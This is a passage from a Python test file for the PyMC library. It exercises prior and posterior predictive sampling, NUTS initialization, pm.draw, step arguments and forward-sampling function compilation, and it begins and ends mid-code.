rng.randn(100))\n meas_in_2 = pm.aesaraf.floatX(5 + 4 * rng.randn(100))\n with pm.Model() as model:\n mu_in_1 = pm.Normal(\"mu_in_1\", 0, 1, initval=0)\n sigma_in_1 = pm.HalfNormal(\"sd_in_1\", 1, initval=1)\n mu_in_2 = pm.Normal(\"mu_in_2\", 0, 1, initval=0)\n sigma_in_2 = pm.HalfNormal(\"sd__in_2\", 1, initval=1)\n\n in_1 = pm.Normal(\"in_1\", mu_in_1, sigma_in_1, observed=meas_in_1)\n in_2 = pm.Normal(\"in_2\", mu_in_2, sigma_in_2, observed=meas_in_2)\n out_diff = in_1 + in_2\n pm.Deterministic(\"out\", out_diff)\n\n with aesara.config.change_flags(mode=fast_unstable_sampling_mode):\n trace = pm.sample(\n tune=100,\n draws=100,\n step=pm.Metropolis(),\n return_inferencedata=False,\n compute_convergence_checks=False,\n random_seed=rng,\n )\n varnames = [v for v in trace.varnames if v != \"out\"]\n ppc_trace = [\n dict(zip(varnames, row)) for row in zip(*(trace.get_values(v) for v in varnames))\n ]\n ppc = pm.sample_posterior_predictive(\n return_inferencedata=False,\n model=model,\n trace=ppc_trace,\n samples=len(ppc_trace),\n var_names=[x.name for x in (model.deterministics + model.basic_RVs)],\n )\n\n rtol = 1e-5 if aesara.config.floatX == \"float64\" else 1e-3\n npt.assert_allclose(ppc[\"in_1\"] + ppc[\"in_2\"], ppc[\"out\"], rtol=rtol)\n\n def test_variable_type(self):\n with pm.Model() as model:\n mu = pm.HalfNormal(\"mu\", 1)\n a = pm.Normal(\"a\", mu=mu, sigma=2, observed=np.array([1, 2]))\n b = pm.Poisson(\"b\", mu, observed=np.array([1, 2]))\n with aesara.config.change_flags(mode=fast_unstable_sampling_mode):\n trace = pm.sample(\n tune=10, draws=10, compute_convergence_checks=False, return_inferencedata=False\n )\n\n with model:\n ppc = pm.sample_posterior_predictive(trace, return_inferencedata=False, samples=1)\n assert ppc[\"a\"].dtype.kind == \"f\"\n assert ppc[\"b\"].dtype.kind == \"i\"\n\n def test_potentials_warning(self):\n warning_msg = \"The effect of Potentials on other parameters is ignored during\"\n with pm.Model() as m:\n a = pm.Normal(\"a\", 0, 1)\n p = pm.Potential(\"p\", a + 1)\n obs = pm.Normal(\"obs\", a, 1, observed=5)\n\n trace = az_from_dict({\"a\": np.random.rand(5)})\n with m:\n with pytest.warns(UserWarning, match=warning_msg):\n pm.sample_posterior_predictive(trace)\n\n def test_idata_extension(self):\n \"\"\"Testing if sample_posterior_predictive() extends inferenceData\"\"\"\n\n with pm.Model() as model:\n mu = pm.Normal(\"mu\", 0.0, 1.0)\n a = pm.Normal(\"a\", mu=mu, sigma=1, observed=[0.0, 1.0])\n idata = pm.sample(tune=10, draws=10, compute_convergence_checks=False)\n\n base_test_dict = {\n \"posterior\": [\"mu\", \"~a\"],\n \"sample_stats\": [\"diverging\", \"lp\"],\n \"log_likelihood\": [\"a\"],\n \"observed_data\": [\"a\"],\n }\n test_dict = {\"~posterior_predictive\": [], \"~predictions\": [], **base_test_dict}\n fails = check_multiple_attrs(test_dict, idata)\n assert not fails\n\n # extending idata with in-sample ppc\n with model:\n pm.sample_posterior_predictive(idata, extend_inferencedata=True)\n # test addition\n test_dict = {\"posterior_predictive\": [\"a\"], \"~predictions\": [], **base_test_dict}\n fails = check_multiple_attrs(test_dict, idata)\n assert not fails\n\n # extending idata with out-of-sample ppc\n with model:\n pm.sample_posterior_predictive(idata, extend_inferencedata=True, predictions=True)\n # test addition\n test_dict = {\"posterior_predictive\": [\"a\"], \"predictions\": [\"a\"], **base_test_dict}\n fails = check_multiple_attrs(test_dict, idata)\n assert not fails\n\n @pytest.mark.parametrize(\"multitrace\", [False, True])\n def test_deterministics_out_of_idata(self, multitrace):\n draws = 10\n chains = 2\n coords = {\"draw\": range(draws), \"chain\": range(chains)}\n ds = xr.Dataset(\n {\n \"a\": xr.DataArray(\n [[0] * draws] * chains,\n coords=coords,\n dims=[\"chain\", \"draw\"],\n )\n },\n coords=coords,\n )\n with pm.Model() as m:\n a = pm.Normal(\"a\")\n if multitrace:\n straces = []\n for chain in ds.chain:\n strace = pm.backends.NDArray(model=m, vars=[a])\n strace.setup(len(ds.draw), int(chain))\n strace.values = {\"a\": ds.a.sel(chain=chain).data}\n strace.draw_idx = len(ds.draw)\n straces.append(strace)\n trace = MultiTrace(straces)\n else:\n trace = ds\n\n d = pm.Deterministic(\"d\", a - 4)\n pm.Normal(\"c\", d, sigma=0.01)\n ppc = pm.sample_posterior_predictive(trace, var_names=\"c\", return_inferencedata=True)\n assert np.all(np.abs(ppc.posterior_predictive.c + 4) <= 0.1)\n\n\n@pytest.mark.xfail(\n reason=\"sample_posterior_predictive_w not refactored for v4\", raises=NotImplementedError\n)\nclass TestSamplePPCW(SeededTest):\n def test_sample_posterior_predictive_w(self):\n data0 = np.random.normal(0, 1, size=50)\n warning_msg = \"The number of samples is too small to check convergence reliably\"\n\n with pm.Model() as model_0:\n mu = pm.Normal(\"mu\", mu=0, sigma=1)\n y = pm.Normal(\"y\", mu=mu, sigma=1, observed=data0)\n with pytest.warns(UserWarning, match=warning_msg):\n trace_0 = pm.sample(10, tune=0, chains=2, return_inferencedata=False)\n idata_0 = pm.to_inference_data(trace_0, log_likelihood=False)\n\n with pm.Model() as model_1:\n mu = pm.Normal(\"mu\", mu=0, sigma=1, size=len(data0))\n y = pm.Normal(\"y\", mu=mu, sigma=1, observed=data0)\n with pytest.warns(UserWarning, match=warning_msg):\n trace_1 = pm.sample(10, tune=0, chains=2, return_inferencedata=False)\n idata_1 = pm.to_inference_data(trace_1, log_likelihood=False)\n\n with pm.Model() as model_2:\n # Model with no observed RVs.\n mu = pm.Normal(\"mu\", mu=0, sigma=1)\n with pytest.warns(UserWarning, match=warning_msg):\n trace_2 = pm.sample(10, tune=0, return_inferencedata=False)\n\n traces = [trace_0, trace_1]\n idatas = [idata_0, idata_1]\n models = [model_0, model_1]\n\n ppc = pm.sample_posterior_predictive_w(traces, 100, models)\n assert ppc[\"y\"].shape == (100, 50)\n\n ppc = pm.sample_posterior_predictive_w(idatas, 100, models)\n assert ppc[\"y\"].shape == (100, 50)\n\n with model_0:\n ppc = pm.sample_posterior_predictive_w([idata_0.posterior], None)\n assert ppc[\"y\"].shape == (20, 50)\n\n with pytest.raises(ValueError, match=\"The number of traces and weights should be the same\"):\n pm.sample_posterior_predictive_w([idata_0.posterior], 100, models, weights=[0.5, 0.5])\n\n with pytest.raises(ValueError, match=\"The number of models and weights should be the same\"):\n pm.sample_posterior_predictive_w([idata_0.posterior], 100, models)\n\n with pytest.raises(\n ValueError, match=\"The number of observed RVs should be the same for all models\"\n ):\n pm.sample_posterior_predictive_w([trace_0, trace_2], 100, [model_0, model_2])\n\n def test_potentials_warning(self):\n warning_msg = \"The effect of Potentials on other parameters is ignored during\"\n with pm.Model() as m:\n a = pm.Normal(\"a\", 0, 1)\n p = pm.Potential(\"p\", a + 1)\n obs = pm.Normal(\"obs\", a, 1, observed=5)\n\n trace = az_from_dict({\"a\": np.random.rand(10)})\n with pytest.warns(UserWarning, match=warning_msg):\n pm.sample_posterior_predictive_w(samples=5, traces=[trace, trace], models=[m, m])\n\n\ndef check_exec_nuts_init(method):\n with pm.Model() as model:\n pm.Normal(\"a\", mu=0, sigma=1, size=2)\n pm.HalfNormal(\"b\", sigma=1)\n with model:\n start, _ = pm.init_nuts(init=method, n_init=10, random_seed=[1])\n assert isinstance(start, list)\n assert len(start) == 1\n assert isinstance(start[0], dict)\n assert set(start[0].keys()) == {v.name for v in model.value_vars}\n start, _ = pm.init_nuts(init=method, n_init=10, chains=2, random_seed=[1, 2])\n assert isinstance(start, list)\n assert len(start) == 2\n assert isinstance(start[0], dict)\n assert set(start[0].keys()) == {v.name for v in model.value_vars}\n\n\n@pytest.mark.parametrize(\n \"method\",\n [\n \"advi\",\n \"ADVI+adapt_diag\",\n \"advi_map\",\n \"jitter+adapt_diag\",\n \"adapt_diag\",\n \"map\",\n \"adapt_full\",\n \"jitter+adapt_full\",\n ],\n)\ndef test_exec_nuts_init(method):\n check_exec_nuts_init(method)\n\n\n@pytest.mark.skip(reason=\"Test requires monkey patching of RandomGenerator\")\n@pytest.mark.parametrize(\n \"initval, jitter_max_retries, expectation\",\n [\n (0, 0, pytest.raises(SamplingError)),\n (0, 1, pytest.raises(SamplingError)),\n (0, 4, does_not_raise()),\n (0, 10, does_not_raise()),\n (1, 0, does_not_raise()),\n ],\n)\ndef test_init_jitter(initval, jitter_max_retries, expectation):\n with pm.Model() as m:\n pm.HalfNormal(\"x\", transform=None, initval=initval)\n\n with expectation:\n # Starting value is negative (invalid) when np.random.rand returns 0 (jitter = -1)\n # and positive (valid) when it returns 1 (jitter = 1)\n with mock.patch(\"numpy.random.Generator.uniform\", side_effect=[-1, -1, -1, 1, -1]):\n start = pm.sampling._init_jitter(\n model=m,\n initvals=None,\n seeds=[1],\n jitter=True,\n jitter_max_retries=jitter_max_retries,\n )\n m.check_start_vals(start)\n\n\n@pytest.fixture(scope=\"class\")\ndef point_list_arg_bug_fixture() -> Tuple[pm.Model, pm.backends.base.MultiTrace]:\n with pm.Model() as pmodel:\n n = pm.Normal(\"n\")\n trace = pm.sample(return_inferencedata=False)\n\n with pmodel:\n d = pm.Deterministic(\"d\", n * 4)\n return pmodel, trace\n\n\nclass TestSamplePriorPredictive(SeededTest):\n def test_ignores_observed(self):\n observed = np.random.normal(10, 1, size=200)\n with pm.Model():\n # Use a prior that's way off to show we're ignoring the observed variables\n observed_data = pm.MutableData(\"observed_data\", observed)\n mu = pm.Normal(\"mu\", mu=-100, sigma=1)\n positive_mu = pm.Deterministic(\"positive_mu\", np.abs(mu))\n z = -1 - positive_mu\n pm.Normal(\"x_obs\", mu=z, sigma=1, observed=observed_data)\n prior = pm.sample_prior_predictive(return_inferencedata=False)\n\n assert \"observed_data\" not in prior\n assert (prior[\"mu\"] < -90).all()\n assert (prior[\"positive_mu\"] > 90).all()\n assert (prior[\"x_obs\"] < -90).all()\n assert prior[\"x_obs\"].shape == (500, 200)\n npt.assert_array_almost_equal(prior[\"positive_mu\"], np.abs(prior[\"mu\"]), decimal=4)\n\n def test_respects_shape(self):\n for shape in (2, (2,), (10, 2), (10, 10)):\n with pm.Model():\n mu = pm.Gamma(\"mu\", 3, 1, size=1)\n goals = pm.Poisson(\"goals\", mu, size=shape)\n trace1 = pm.sample_prior_predictive(\n 10, return_inferencedata=False, var_names=[\"mu\", \"mu\", \"goals\"]\n )\n trace2 = pm.sample_prior_predictive(\n 10, return_inferencedata=False, var_names=[\"mu\", \"goals\"]\n )\n if shape == 2: # want to test shape as an int\n shape = (2,)\n assert trace1[\"goals\"].shape == (10,) + shape\n assert trace2[\"goals\"].shape == (10,) + shape\n\n def test_multivariate(self):\n with pm.Model():\n m = pm.Multinomial(\"m\", n=5, p=np.array([0.25, 0.25, 0.25, 0.25]))\n trace = pm.sample_prior_predictive(10)\n\n assert trace.prior[\"m\"].shape == (1, 10, 4)\n\n def test_multivariate2(self):\n # Added test for issue #3271\n mn_data = np.random.multinomial(n=100, pvals=[1 / 6.0] * 6, size=10)\n with pm.Model() as dm_model:\n probs = pm.Dirichlet(\"probs\", a=np.ones(6))\n obs = pm.Multinomial(\"obs\", n=100, p=probs, observed=mn_data)\n with aesara.config.change_flags(mode=fast_unstable_sampling_mode):\n burned_trace = pm.sample(\n tune=10,\n draws=20,\n chains=1,\n return_inferencedata=False,\n compute_convergence_checks=False,\n )\n sim_priors = pm.sample_prior_predictive(\n return_inferencedata=False, samples=20, model=dm_model\n )\n sim_ppc = pm.sample_posterior_predictive(\n burned_trace, return_inferencedata=False, samples=20, model=dm_model\n )\n assert sim_priors[\"probs\"].shape == (20, 6)\n assert sim_priors[\"obs\"].shape == (20,) + mn_data.shape\n assert sim_ppc[\"obs\"].shape == (20,) + mn_data.shape\n\n def test_layers(self):\n with pm.Model() as model:\n a = pm.Uniform(\"a\", lower=0, upper=1, size=10)\n b = pm.Binomial(\"b\", n=1, p=a, size=10)\n\n b_sampler = compile_pymc([], b, mode=\"FAST_RUN\", random_seed=232093)\n avg = np.stack([b_sampler() for i in range(10000)]).mean(0)\n npt.assert_array_almost_equal(avg, 0.5 * np.ones((10,)), decimal=2)\n\n def test_transformed(self):\n n = 18\n at_bats = 45 * np.ones(n, dtype=int)\n hits = np.random.randint(1, 40, size=n, dtype=int)\n draws = 50\n\n with pm.Model() as model:\n phi = pm.Beta(\"phi\", alpha=1.0, beta=1.0)\n\n kappa_log = pm.Exponential(\"logkappa\", lam=5.0)\n kappa = pm.Deterministic(\"kappa\", at.exp(kappa_log))\n\n thetas = pm.Beta(\"thetas\", alpha=phi * kappa, beta=(1.0 - phi) * kappa, size=n)\n\n y = pm.Binomial(\"y\", n=at_bats, p=thetas, observed=hits)\n gen = pm.sample_prior_predictive(draws)\n\n assert gen.prior[\"phi\"].shape == (1, draws)\n assert gen.prior_predictive[\"y\"].shape == (1, draws, n)\n assert \"thetas\" in gen.prior.data_vars\n\n def test_shared(self):\n n1 = 10\n obs = shared(np.random.rand(n1) < 0.5)\n draws = 50\n\n with pm.Model() as m:\n p = pm.Beta(\"p\", 1.0, 1.0)\n y = pm.Bernoulli(\"y\", p, observed=obs)\n o = pm.Deterministic(\"o\", obs)\n gen1 = pm.sample_prior_predictive(draws)\n\n assert gen1.prior_predictive[\"y\"].shape == (1, draws, n1)\n assert gen1.prior[\"o\"].shape == (1, draws, n1)\n\n n2 = 20\n obs.set_value(np.random.rand(n2) < 0.5)\n with m:\n gen2 = pm.sample_prior_predictive(draws)\n\n assert gen2.prior_predictive[\"y\"].shape == (1, draws, n2)\n assert gen2.prior[\"o\"].shape == (1, draws, n2)\n\n def test_density_dist(self):\n obs = np.random.normal(-1, 0.1, size=10)\n with pm.Model():\n mu = pm.Normal(\"mu\", 0, 1)\n sigma = pm.HalfNormal(\"sigma\", 1e-6)\n a = pm.DensityDist(\n \"a\",\n mu,\n sigma,\n random=lambda mu, sigma, rng=None, size=None: rng.normal(\n loc=mu, scale=sigma, size=size\n ),\n observed=obs,\n )\n prior = pm.sample_prior_predictive(return_inferencedata=False)\n\n npt.assert_almost_equal((prior[\"a\"] - prior[\"mu\"][..., None]).mean(), 0, decimal=3)\n\n def test_shape_edgecase(self):\n with pm.Model():\n mu = pm.Normal(\"mu\", size=5)\n sigma = pm.Uniform(\"sigma\", lower=2, upper=3)\n x = pm.Normal(\"x\", mu=mu, sigma=sigma, size=5)\n prior = pm.sample_prior_predictive(10)\n assert prior.prior[\"mu\"].shape == (1, 10, 5)\n\n def test_zeroinflatedpoisson(self):\n with pm.Model():\n mu = pm.Beta(\"mu\", alpha=1, beta=1)\n psi = pm.HalfNormal(\"psi\", sigma=1)\n pm.ZeroInflatedPoisson(\"suppliers\", psi=psi, mu=mu, size=20)\n gen_data = pm.sample_prior_predictive(samples=5000)\n assert gen_data.prior[\"mu\"].shape == (1, 5000)\n assert gen_data.prior[\"psi\"].shape == (1, 5000)\n assert gen_data.prior[\"suppliers\"].shape == (1, 5000, 20)\n\n def test_potentials_warning(self):\n warning_msg = \"The effect of Potentials on other parameters is ignored during\"\n with pm.Model() as m:\n a = pm.Normal(\"a\", 0, 1)\n p = pm.Potential(\"p\", a + 1)\n\n with m:\n with pytest.warns(UserWarning, match=warning_msg):\n pm.sample_prior_predictive(samples=5)\n\n def test_transformed_vars(self):\n # Test that prior predictive returns transformation of RVs when these are\n # passed explicitly in `var_names`\n\n def ub_interval_forward(x, ub):\n # Interval transform assuming lower bound is zero\n return np.log(x - 0) - np.log(ub - x)\n\n with pm.Model() as model:\n ub = pm.HalfNormal(\"ub\", 10)\n x = pm.Uniform(\"x\", 0, ub)\n\n prior = pm.sample_prior_predictive(\n var_names=[\"ub\", \"ub_log__\", \"x\", \"x_interval__\"],\n samples=10,\n random_seed=123,\n )\n\n # Check values are correct\n assert np.allclose(prior.prior[\"ub_log__\"].data, np.log(prior.prior[\"ub\"].data))\n assert np.allclose(\n prior.prior[\"x_interval__\"].data,\n ub_interval_forward(prior.prior[\"x\"].data, prior.prior[\"ub\"].data),\n )\n\n # Check that it works when the original RVs are not mentioned in var_names\n with pm.Model() as model_transformed_only:\n ub = pm.HalfNormal(\"ub\", 10)\n x = pm.Uniform(\"x\", 0, ub)\n\n prior_transformed_only = pm.sample_prior_predictive(\n var_names=[\"ub_log__\", \"x_interval__\"],\n samples=10,\n random_seed=123,\n )\n assert (\n \"ub\" not in prior_transformed_only.prior.data_vars\n and \"x\" not in prior_transformed_only.prior.data_vars\n )\n assert np.allclose(\n prior.prior[\"ub_log__\"].data, prior_transformed_only.prior[\"ub_log__\"].data\n )\n assert np.allclose(\n prior.prior[\"x_interval__\"], prior_transformed_only.prior[\"x_interval__\"].data\n )\n\n def test_issue_4490(self):\n # Test that samples do not depend on var_name order or, more fundamentally,\n # that they do not depend on the set order used inside `sample_prior_predictive`\n seed = 4490\n with pm.Model() as m1:\n a = pm.Normal(\"a\")\n b = pm.Normal(\"b\")\n c = pm.Normal(\"c\")\n d = pm.Normal(\"d\")\n prior1 = pm.sample_prior_predictive(\n samples=1, var_names=[\"a\", \"b\", \"c\", \"d\"], random_seed=seed\n )\n\n with pm.Model() as m2:\n a = pm.Normal(\"a\")\n b = pm.Normal(\"b\")\n c = pm.Normal(\"c\")\n d = pm.Normal(\"d\")\n prior2 = pm.sample_prior_predictive(\n samples=1, var_names=[\"b\", \"a\", \"d\", \"c\"], random_seed=seed\n )\n\n assert prior1.prior[\"a\"] == prior2.prior[\"a\"]\n assert prior1.prior[\"b\"] == prior2.prior[\"b\"]\n assert prior1.prior[\"c\"] == prior2.prior[\"c\"]\n assert prior1.prior[\"d\"] == prior2.prior[\"d\"]\n\n def test_aesara_function_kwargs(self):\n sharedvar = aesara.shared(0)\n with pm.Model() as m:\n x = pm.DiracDelta(\"x\", 0)\n y = pm.Deterministic(\"y\", x + sharedvar)\n\n prior = pm.sample_prior_predictive(\n samples=5,\n return_inferencedata=False,\n compile_kwargs=dict(\n mode=Mode(\"py\"),\n updates={sharedvar: sharedvar + 1},\n ),\n )\n\n assert np.all(prior[\"y\"] == np.arange(5))\n\n\nclass TestSamplePosteriorPredictive:\n def test_point_list_arg_bug_spp(self, point_list_arg_bug_fixture):\n pmodel, trace = point_list_arg_bug_fixture\n with pmodel:\n pp = pm.sample_posterior_predictive(\n [trace[15]], return_inferencedata=False, var_names=[\"d\"]\n )\n\n def test_sample_from_xarray_prior(self, point_list_arg_bug_fixture):\n pmodel, trace = point_list_arg_bug_fixture\n\n with pmodel:\n prior = pm.sample_prior_predictive(\n samples=20,\n return_inferencedata=False,\n )\n idat = pm.to_inference_data(trace, prior=prior)\n\n with pmodel:\n pp = pm.sample_posterior_predictive(\n idat.prior, return_inferencedata=False, var_names=[\"d\"]\n )\n\n def test_sample_from_xarray_posterior(self, point_list_arg_bug_fixture):\n pmodel, trace = point_list_arg_bug_fixture\n with pmodel:\n idat = pm.to_inference_data(trace)\n pp = pm.sample_posterior_predictive(idat.posterior, var_names=[\"d\"])\n\n def test_aesara_function_kwargs(self):\n sharedvar = aesara.shared(0)\n with pm.Model() as m:\n x = pm.DiracDelta(\"x\", 0.0)\n y = pm.Deterministic(\"y\", x + sharedvar)\n\n pp = pm.sample_posterior_predictive(\n trace=az_from_dict({\"x\": np.arange(5)}),\n var_names=[\"y\"],\n return_inferencedata=False,\n compile_kwargs=dict(\n mode=Mode(\"py\"),\n updates={sharedvar: sharedvar + 1},\n ),\n )\n\n assert np.all(pp[\"y\"] == np.arange(5) * 2)\n\n\nclass TestDraw(SeededTest):\n def test_univariate(self):\n with pm.Model():\n x = pm.Normal(\"x\")\n\n x_draws = pm.draw(x)\n assert x_draws.shape == ()\n\n (x_draws,) = pm.draw([x])\n assert x_draws.shape == ()\n\n x_draws = pm.draw(x, draws=10)\n assert x_draws.shape == (10,)\n\n (x_draws,) = pm.draw([x], draws=10)\n assert x_draws.shape == (10,)\n\n def test_multivariate(self):\n with pm.Model():\n mln = pm.Multinomial(\"mln\", n=5, p=np.array([0.25, 0.25, 0.25, 0.25]))\n\n mln_draws = pm.draw(mln, draws=1)\n assert mln_draws.shape == (4,)\n\n (mln_draws,) = pm.draw([mln], draws=1)\n assert mln_draws.shape == (4,)\n\n mln_draws = pm.draw(mln, draws=10)\n assert mln_draws.shape == (10, 4)\n\n (mln_draws,) = pm.draw([mln], draws=10)\n assert mln_draws.shape == (10, 4)\n\n def test_multiple_variables(self):\n with pm.Model():\n x = pm.Normal(\"x\")\n y = pm.Normal(\"y\", shape=10)\n z = pm.Uniform(\"z\", shape=5)\n w = pm.Dirichlet(\"w\", a=[1, 1, 1])\n\n num_draws = 100\n draws = pm.draw((x, y, z, w), draws=num_draws)\n assert draws[0].shape == (num_draws,)\n assert draws[1].shape == (num_draws, 10)\n assert draws[2].shape == (num_draws, 5)\n assert draws[3].shape == (num_draws, 3)\n\n def test_draw_different_samples(self):\n with pm.Model():\n x = pm.Normal(\"x\")\n\n x_draws_1 = pm.draw(x, 100)\n x_draws_2 = pm.draw(x, 100)\n assert not np.all(np.isclose(x_draws_1, x_draws_2))\n\n def test_draw_aesara_function_kwargs(self):\n sharedvar = aesara.shared(0)\n x = pm.DiracDelta.dist(0.0)\n y = x + sharedvar\n draws = pm.draw(\n y,\n draws=5,\n mode=Mode(\"py\"),\n updates={sharedvar: sharedvar + 1},\n )\n assert np.all(draws == np.arange(5))\n\n\ndef test_step_args():\n with pm.Model() as model:\n a = pm.Normal(\"a\")\n idata0 = pm.sample(target_accept=0.5, random_seed=1410)\n idata1 = pm.sample(nuts={\"target_accept\": 0.5}, random_seed=1410 * 2)\n idata2 = pm.sample(target_accept=0.5, nuts={\"max_treedepth\": 10}, random_seed=1410)\n\n with pytest.raises(ValueError, match=\"`target_accept` was defined twice.\"):\n pm.sample(target_accept=0.5, nuts={\"target_accept\": 0.95}, random_seed=1410)\n\n npt.assert_almost_equal(idata0.sample_stats.acceptance_rate.mean(), 0.5, decimal=1)\n npt.assert_almost_equal(idata1.sample_stats.acceptance_rate.mean(), 0.5, decimal=1)\n npt.assert_almost_equal(idata2.sample_stats.acceptance_rate.mean(), 0.5, decimal=1)\n\n with pm.Model() as model:\n a = pm.Normal(\"a\")\n b = pm.Poisson(\"b\", 1)\n idata0 = pm.sample(target_accept=0.5, random_seed=1418)\n idata1 = pm.sample(\n nuts={\"target_accept\": 0.5}, metropolis={\"scaling\": 0}, random_seed=1418 * 2\n )\n\n npt.assert_almost_equal(idata0.sample_stats.acceptance_rate.mean(), 0.5, decimal=1)\n npt.assert_almost_equal(idata1.sample_stats.acceptance_rate.mean(), 0.5, decimal=1)\n npt.assert_allclose(idata1.sample_stats.scaling, 0)\n\n\ndef test_init_nuts(caplog):\n with pm.Model() as model:\n a = pm.Normal(\"a\")\n pm.sample(10, tune=10)\n assert \"Initializing NUTS\" in caplog.text\n\n\ndef test_no_init_nuts_step(caplog):\n with pm.Model() as model:\n a = pm.Normal(\"a\")\n pm.sample(10, tune=10, step=pm.NUTS([a]))\n assert \"Initializing NUTS\" not in caplog.text\n\n\ndef test_no_init_nuts_compound(caplog):\n with pm.Model() as model:\n a = pm.Normal(\"a\")\n b = pm.Poisson(\"b\", 1)\n pm.sample(10, tune=10)\n assert \"Initializing NUTS\" not in caplog.text\n\n\nclass TestCompileForwardSampler:\n @staticmethod\n def get_function_roots(function):\n return [\n var\n for var in aesara.graph.basic.graph_inputs(function.maker.fgraph.outputs)\n if var.name\n ]\n\n @staticmethod\n def get_function_inputs(function):\n return {i for i in function.maker.fgraph.inputs if not isinstance(i, SharedVariable)}\n\n def test_linear_model(self):\n with pm.Model() as model:\n x = pm.MutableData(\"x\", np.linspace(0, 1, 10))\n y = pm.MutableData(\"y\", np.ones(10))\n\n alpha = pm.Normal(\"alpha\", 0, 0.1)\n beta = pm.Normal(\"beta\", 0, 0.1)\n mu = pm.Deterministic(\"mu\", alpha + beta * x)\n sigma = pm.HalfNormal(\"sigma\", 0.1)\n obs = pm.Normal(\"obs\", mu, sigma, observed=y)\n\n f = compile_forward_sampling_function(\n [obs],\n vars_in_trace=[alpha, beta, sigma, mu],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"alpha\", \"beta\", \"sigma\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"x\", \"alpha\", \"beta\", \"sigma\"}\n\n with pm.Model() as model:\n x = pm.ConstantData(\"x\", np.linspace(0, 1, 10))\n y = pm.MutableData(\"y\", np.ones(10))\n\n alpha = pm.Normal(\"alpha\", 0, 0.1)\n beta = pm.Normal(\"beta\", 0, 0.1)\n mu = pm.Deterministic(\"mu\", alpha + beta * x)\n sigma = pm.HalfNormal(\"sigma\", 0.1)\n obs = pm.Normal(\"obs\", mu, sigma, observed=y)\n\n f = compile_forward_sampling_function(\n [obs],\n vars_in_trace=[alpha, beta, sigma, mu],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"alpha\", \"beta\", \"sigma\", \"mu\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"mu\", \"sigma\"}\n\n def test_nested_observed_model(self):\n with pm.Model() as model:\n p = pm.ConstantData(\"p\", np.array([0.25, 0.5, 0.25]))\n x = pm.MutableData(\"x\", np.zeros(10))\n y = pm.MutableData(\"y\", np.ones(10))\n\n category = pm.Categorical(\"category\", p, observed=x)\n beta = pm.Normal(\"beta\", 0, 0.1, size=p.shape)\n mu = pm.Deterministic(\"mu\", beta[category])\n sigma = pm.HalfNormal(\"sigma\", 0.1)\n pm.Normal(\"obs\", mu, sigma, observed=y)\n\n f = compile_forward_sampling_function(\n outputs=model.observed_RVs,\n vars_in_trace=[beta, mu, sigma],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"beta\", \"sigma\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"x\", \"p\", \"beta\", \"sigma\"}\n\n f = compile_forward_sampling_function(\n outputs=model.observed_RVs,\n vars_in_trace=[beta, mu, sigma],\n basic_rvs=model.basic_RVs,\n givens_dict={category: np.zeros(10, dtype=category.dtype)},\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"beta\", \"sigma\"}\n assert {i.name for i in self.get_function_roots(f)} == {\n \"x\",\n \"p\",\n \"category\",\n \"beta\",\n \"sigma\",\n }\n\n def test_volatile_parameters(self):\n with pm.Model() as model:\n y = pm.MutableData(\"y\", np.ones(10))\n mu = pm.Normal(\"mu\", 0, 1)\n nested_mu = pm.Normal(\"nested_mu\", mu, 1, size=10)\n sigma = pm.HalfNormal(\"sigma\", 1)\n pm.Normal(\"obs\", nested_mu, sigma, observed=y)\n\n f = compile_forward_sampling_function(\n outputs=model.observed_RVs,\n vars_in_trace=[nested_mu, sigma], # mu isn't in the trace and will be deemed volatile\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"sigma\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"sigma\"}\n\n f = compile_forward_sampling_function(\n outputs=model.observed_RVs,\n vars_in_trace=[mu, nested_mu, sigma],\n basic_rvs=model.basic_RVs,\n givens_dict={\n mu: np.array(1.0)\n }, # mu will be considered volatile because it's in givens\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"sigma\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"mu\", \"sigma\"}\n\n def test_distributions_op_from_graph(self):\n with pm.Model() as model:\n w = pm.Dirichlet(\"w\", a=np.ones(3), size=(5, 3))\n\n mu = pm.Normal(\"mu\", mu=np.arange(3), sigma=1)\n\n components = pm.Normal.dist(mu=mu, sigma=1, size=w.shape)\n mix_mu = pm.Mixture(\"mix_mu\", w=w, comp_dists=components)\n obs = pm.Normal(\"obs\", mix_mu, 1, observed=np.ones((5, 3)))\n\n f = compile_forward_sampling_function(\n outputs=[obs],\n vars_in_trace=[mix_mu, mu, w],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"w\", \"mu\", \"mix_mu\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"mix_mu\"}\n\n f = compile_forward_sampling_function(\n outputs=[obs],\n vars_in_trace=[mu, w],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"w\", \"mu\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"w\", \"mu\"}\n\n f = compile_forward_sampling_function(\n outputs=[obs],\n vars_in_trace=[mix_mu, mu],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"mu\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"mu\"}\n\n def test_distributions_no_op_from_graph(self):\n with pm.Model() as model:\n latent_mu = pm.Normal(\"latent_mu\", mu=np.arange(3), sigma=1)\n mu = pm.Censored(\"mu\", pm.Normal.dist(mu=latent_mu, sigma=1), lower=-1, upper=1)\n obs = pm.Normal(\"obs\", mu, 1, observed=np.ones((10, 3)))\n\n f = compile_forward_sampling_function(\n outputs=[obs],\n vars_in_trace=[latent_mu, mu],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"latent_mu\", \"mu\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"mu\"}\n\n f = compile_forward_sampling_function(\n outputs=[obs],\n vars_in_trace=[mu],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == set()\n assert {i.name for i in self.get_function_roots(f)} == set()\n\n def test_lkj_cholesky_cov(self):\n with pm.Model() as model:\n mu = np.zeros(3)\n sd_dist = pm.Exponential.dist(1.0, 